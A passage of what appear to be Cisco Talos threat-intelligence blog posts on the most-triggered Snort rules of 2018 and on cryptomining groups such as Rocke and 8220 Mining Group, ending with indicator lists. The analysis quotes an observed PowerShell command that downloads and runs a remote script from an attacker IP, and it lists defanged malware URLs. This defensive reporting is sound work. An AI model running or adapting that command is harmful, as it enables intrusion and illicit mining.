patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 & 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" & \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).", "cvss3": {}, "published": "2019-02-06T08:19:00", "type": "talosblog", "title": "2018 in Snort Rules", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "modified": "2019-02-12T14:15:53", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-18T17:32:28", "description": "_Post authored by [David Liebenberg](<https://www.google.com/url?q=https://twitter.com/chinahanddave&sa=D&ust=1545149724666000>) and [Andrew Williams](<https://www.google.com/url?q=https://twitter.com/smugyeti&sa=D&ust=1545149724667000>)._ \n\n\n### Executive Summary\n\nThrough Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined. \n \nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. \n \nWe will cover the recent activities of these actors: \n\n\n * Rocke \u2014A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.\n * 8220 Mining Group \u2014Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.\n * Tor2Mine \u2014A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).\nThese groups have used similar TTPs, including: \n\n\n * Malicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download and execute miners.\n * The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.\n * Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.\n * Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\n * Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.\nWe were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the [illicit cryptocurrency threat](<https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&sa=D&ust=1545149724689000>). However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published [separate research today covering this trend.](<https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html>) \n\n\n### Timeline of actors' campaigns\n\n#### [](<https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg>) \n--- \nTimeline of Activity \n \n#### Introduction\n\nIllicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware. \n \nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. \n \nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. \n \nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they additionally used tor2web services for C2 communications. \n \nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits. \n \n\n\n#### \n\n#### Rocke/Iron cybercrime group\n\nCisco Talos wrote about [Rocke](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&sa=D&ust=1545149724706000>) earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. \n \nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted [Jenkins ](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&sa=D&ust=1545149724712000>)and [JBoss](<https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&sa=D&ust=1545149724712000>) servers, continuing to rely on malicious Git repositories, as well as malicious [Amazon Machine Images](<https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&sa=D&ust=1545149724714000>). They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware [capabilities](<https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&sa=D&ust=1545149724714000>). Several campaigns used the XHide Process Faker tool. \n \nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. \n \nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files. \n \nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called [whatMiner](<https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&sa=D&ust=1545149724720000>), developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\" \n\n\n[](<https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png>)\n\n#### \n\n#### Git repository for whatMiner\n\nLooking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one. \n \nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet. \n \nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as well as a file called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called \"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn. \n \nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services. \n \nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke\u2019s github since November, nor have we seen related samples in our honeypots since that time. \n \n\n\n#### 8220 Mining Group\n\nAs we previously described, Rocke originally forked a repository called \"whatMiner.\" We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor \u2014 8220 Mining Group \u2014 due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke. \n \nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed: \n\n\n[](<https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png>)\n\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for. \n \nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited [Drupal](<https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&sa=D&ust=1545149724754000>) content management system, [Hadoop YARN, Redis, Weblogic and Couch](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724756000>)[DB](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724757000>). Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious [Docker images](<https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&sa=D&ust=1545149724758000>). 8220 Mining Group was able to [amass](<https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&sa=D&ust=1545149724759000>) nearly $200,000 worth of Monero through their campaigns. \n \nThere were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing. \n \n\n\n#### \n\n#### tor2mine\n\nOver the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden. \n \nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to. \n \nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system: \n \n\n\n> C:\\\\\\Windows\\\\\\System32\\\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\n\n \nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC \u2014 a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk. \n \nWe began to research the malware and infrastructure used in this campaign. We observed [previous research](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&sa=D&ust=1545149724777000>) on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\" that was almost identical to one we saw hosted on the tor2mine actors C2, \"check.hta:\" \n \n/win/checking-test.hta from [previous campaign](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) \n\n\n[](<https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png>)\n\ncheck.hta \n\n\n[](<https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png>)\n\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool. \n \nSimilarly, in [February 2018](<https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&sa=D&ust=1545149724785000>), Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. \n \nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign. \n \n\n\n#### \n\n#### Conclusion\n\nThrough tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate. \n \nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. \n \nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke\u2019s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig. \n \nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies. \n \n\n\n#### \n\n#### Coverage\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://www.google.com/url?q=https://talosintelligence.com/resources/59&sa=D&ust=1545149724800000>) \n\n\n[](<https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png>)\n\n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1545149724807000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1545149724809000>)) or[ Web Security Appliance (WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1545149724810000>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1545149724813000>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1545149724814000>)), and[ Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1545149724816000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1545149724818000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1545149724820000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1545149724823000>). \n \n\n\n### IOCs\n\n#### \n\n#### Rocke\n\nIPs: \n121[.]126[.]223[.]211 \n142[.]44[.]215[.]177 \n144[.]217[.]61[.]147 \n118[.]24[.]150[.]172 \n185[.]133[.]193[.]163 \n \nDomains: \nxmr.enjoytopic[.]tk \nd.paloaltonetworks[.]tk \nthreatpost[.]tk \n3g2upl4pq6kufc4m[.]tk \nscan.3g2upl4pq6kufc4m[.]tk \ne3sas6tzvehwgpak[.]tk \nsample.sydwzl[.]cn \nblockbitcoin[.]com \nscan.blockbitcoin[.]tk \ndazqc4f140wtl[.]cloudfront[.]net \nd3goboxon32grk2l[.]tk \nenjoytopic[.]tk \nrealtimenews[.]tk \n8282[.]space \n3389[.]space \nsvss[.]space \nenjoytopic[.]esy[.]es \nlienjoy[.]esy[.]es \nd3oxpv9ajpsgxt[.]cloudfront[.]net \nd3lvemwrafj7a7[.]cloudfront[.]net \nd1ebv77j9rbkp6[.]enjoytopic[.]com \nswb[.]one \nd1uga3uzpppiit[.]cloudfront[.]net \nemsisoft[.]enjoytopic[.]tk \nejectrift[.]censys[.]xyz \nscan[.]censys[.]xyz \napi[.]leakingprivacy[.]tk \nnews[.]realnewstime[.]xyz \nscan[.]realnewstime[.]xyz \nnews[.]realtimenews[.]tk \nscanaan[.]tk \nwww[.]qicheqiche[.]com \n \nURLs: \nhxxps://github[.]com/yj12ni \nhxxps://github[.]com/rocke \nhxxps://github[.]com/freebtcminer/ \nhxxps://github[.]com/tightsoft \nhxxps://raw[.]githubusercontent[.]com/ghostevilxp \nhxxp://www[.]qicheqiche[.]com \nhxxp://123[.]206[.]13[.]220:8899 \nhxxps://gitee[.]com/c-888/ \nhxxp://gitlab[.]com/c-18 \nhxxp://www[.]ssvs[.]space/root[.]bin \nhxxp://a[.]ssvs[.]space/db[.]sh \nhxxp://a[.]ssvs[.]space/cf[.]cf \nhxxp://a[.]ssvs[.]space/pluto \nhxxp://ip[.]ssvs[.]space/xm64 \nhxxp://ip[.]ssvs[.]space/wt[.]conf \nhxxp://ip[.]ssvs[.]space/mr[.]sh \nhxxp://a[.]ssvs[.]space/logo[.]jpg \nhxxp://a[.]sydwzl[.]cn/root[.]bin \nhxxp://a[.]sydwzl[.]cn/x86[.]bin \nhxxp://a[.]sydwzl[.]cn/bar[.]sh \nhxxp://a[.]sydwzl[.]cn/crondb \nhxxp://a[.]sydwzl[.]cn/pools[.]txt \nhxxps://pastebin[.]com/raw/5bjpjvLP \nhxxps://pastebin[.]com/raw/Fj2YdETv \nhxxps://pastebin[.]com/raw/eRkrSQfE \nhxxps://pastebin[.]com/raw/Gw7mywhC \nhxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg \nhxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg \nhxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg \nhxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408 \n \nSHA-256: \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin \n00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin \ncdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh \n959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf \nd11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64 \nda641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin \n2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf \nb1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh \n7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin \n904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg \nf792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin 